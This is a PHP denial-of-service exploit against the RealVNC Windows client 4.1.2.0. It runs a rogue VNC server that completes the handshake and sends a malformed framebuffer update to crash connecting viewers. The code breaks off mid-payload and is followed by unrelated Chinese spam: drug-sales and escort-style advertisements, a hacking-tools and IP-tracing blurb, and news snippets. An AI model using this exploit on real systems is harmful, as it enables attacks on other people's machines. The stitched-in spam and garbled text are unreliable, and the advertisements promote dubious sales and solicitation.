#!/usr/bin/php <?php # RealVNC Windows Client DoS# AppName: vncviewer.exe # AppVer: 4.1.2.0 # ModName: vncviewer.exe # ModVer: 4.1.2.0 # Offset: 000229e0 function vncear() { $port = "5900"; $ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1); socket_bind($ser,"0.0.0.0", $port); socket_listen($ser, 5); print "\n[+] listening on $port ...\n"; $crashvnc = socket_accept($ser); print "[+] client connected\n"; // ProtocolVersion socket_write($crashvnc, "RFB 003.008\n"); while($i=socket_read($crashvnc, 1024)) if(substr($i,0,6) == "RFB 00") break; print "\tprotocol has been negotiated\n"; // Security type none socket_write($crashvnc, "\x01\x01"); while($i=socket_read($crashvnc, 1024)) if(ord($i[0])==1)break; //$i=socket_read($crashvnc, 124); print "\tsecurity type accepted\n"; // SecurityResult ok socket_write($crashvnc, "\x00\x00\x00\x00"); while($i=socket_read($crashvnc, 1024)) if(ord($i[0])==0 || ord($i[0])==1)break; // socket_write($crashvnc, "\x04\x00". //frame buffer width "\x03\x00". //frame buffer height /* pixel format */ "\x20". //bits per pixel "\x18". //depth "\x00". // big endian flag "\x01". // true color flag "\x00\xFF". //red max "\x00\xFF". //green max "\x00\xFF". //blue max "\x10". //red shift "\x08". //green shift "\x00". //blue shift "\x00\x00\x00". //padding /* pixel format */ "\x00\x00\x00\x08". //name lenght "\x41\x4E\x59\x55\x4C\x49\x4E\x41" // name ANYULINA ); socket_write($crashvnc, "\x00\x00\x00\x03". //frame buffer update "\x00\x05\xFF\xFF\x00\x11\x00\x14\xFF\xFF\xFF\x11". "\x3F\x3F\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F". "\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F". "\x3F\x00\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F". "\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F". "\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F". "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x00\x3F\x3F\x3F\x3F\x3F". "\x3F\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x3F\x3F\x00\x00\x3F". "\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F". "\x00\x00\x00\x3F". "\x00\x3F\x3F\x00\x00\x3F\x3F". "\x00\x3F\x3F\x00\x3F\x3F\x00\x3F\x3F\x00\x00\x3F\x3F\x3F\x00\x3F". "\x3F\x3F\x3F\x3F\x3F\x3F\x3F". "\x00\x3F\x
印度吉非替尼价格可以咨询印信国际医疗微信yxgj38 易瑞沙(吉非替尼)是一种治疗肿瘤的靶向药物,对治疗EGFR突变中常见的是19号外显子缺失和21号外显子L858R基因突变有非常显著的效果。易瑞沙可...
这个含糊测验方针现已至少发现了一个security regression:缝隙,修正补丁。 该缝隙的Reproducer输入是一个带有音讯文本的可读文件。 在2018年11月,咱们发现了CozyDuk...
他的位置是:山东省济宁市网通这里可以查询参考资料:> 用工具吧!推荐一个好地方,那里有很多黑客工具!参考资料: 真的有技术的人用QQ就能定位到IP因为你在和一个人聊天的时候就创建了一个这样的你的...
上海高档模特预约 上海绝品兼职模特微信公众平台【华清怡】 今日给大伙儿共享的內容是“上海高档模特预约 上海绝品兼职模特微信公众平台【华清怡】”,我是华清怡,来源于西青区,2020年三十岁,做为岗位:广...
从开工建设刚开始就一直备受关注的北京市环球影城前不久传出了喜讯,北京市环球影城七个主题游乐园早已圆满完成工程验收,北京市环球影城第一批买票配额对外开放,这一信息但是让许多小伙伴们按耐不住了起來,大家都...
正在上网课的你知道清明节要放假了,你会有什么想法呢,有的小伙伴们觉得内心毫无波澜甚至有点悲伤,冲掉了一周中课最多的一天,后面还要在补回来的。下面友谊长存小编带来:上网课听说清明节要放假时是什么心情...